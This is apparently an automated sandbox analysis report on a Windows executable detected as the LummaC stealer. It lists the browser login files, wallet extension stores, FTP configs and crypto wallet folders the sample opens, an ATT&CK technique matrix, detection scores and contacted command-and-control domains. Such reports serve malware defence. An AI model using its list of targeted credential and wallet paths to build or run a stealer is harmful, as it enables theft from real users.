Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\TTCBKWZYOC	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\TTCBKWZYOC	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior
Source: C:\Users\user\Desktop\6GNqkkKY0j.exe	Directory queried: C:\Users\user\Documents\IVHSHTCODI	Jump to behavior

Source: Yara match	File source: 00000000.00000003.3002739984.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3020004985.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3023883651.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.3024388435.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2695354440.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6GNqkkKY0j.exe PID: 3500, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 6GNqkkKY0j.exe PID: 3500, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	44 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	851 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	44 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	223 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6GNqkkKY0j.exe	53%	Virustotal		Browse
6GNqkkKY0j.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
6GNqkkKY0j.exe	100%	Avira	TR/Crypt.TPM.Gen
6GNqkkKY0j.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://lev-tolstoi.com/pi9	100%	Avira URL Cloud	malware
https://lev-tolstoi.com:443/apizchhhv.default-release/key4.dbPK	100%	Avira URL Cloud	malware
https://lev-tolstoi.com:	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/ee	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/9	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/4	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/A	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/Q	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/api4&	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
wordyfindy.lat	unknown	unknown	false	high
slipperyloo.lat	unknown	unknown	true	unknown
curverpluch.lat	unknown	unknown	true	unknown
tentabatte.lat	unknown	unknown	true	unknown
manyrestro.lat	unknown	unknown	true	unknown
bashfulacid.lat	unknown	unknown	true	unknown
shapestickyr.lat	unknown	unknown	true	unknown
observerfry.lat	unknown	unknown	false	high
talkynicer.lat	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
slipperyloo.lat	false	high
observerfry.lat	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
https://lev-tolstoi.com/api	false	high
curverpluch.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high
bashfulacid.lat	false	high
wordyfindy.lat	false	high
shapestickyr.lat	false	high
talkynicer.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	6GNqkkKY0j.exe, 00000000.00000003.3005561903.0000000005D3F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/Q	6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/pi9	6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/	6GNqkkKY0j.exe, 00000000.00000003.3019711227.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042608843.0000000001435000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2760225701.0000000001426000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075806149.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042684703.0000000001442000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2397268790.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075561492.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3075431589.0000000001437000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.3042472090.000000000142A000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000002.3081493922.0000000001443000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181266459.000000000142F000.00000004.00000020.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2181310771.00000000013AB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	6GNqkkKY0j.exe, 00000000.00000003.3003017131.0000000005D63000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	6GNqkkKY0j.exe, 00000000.00000003.2181266459.0000000001433000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	6GNqkkKY0j.exe, 00000000.00000003.2398410423.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398278526.0000000005CEE000.00000004.00000800.00020000.00000000.sdmp, 6GNqkkKY0j.exe, 00000000.00000003.2398339446.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp	false		high
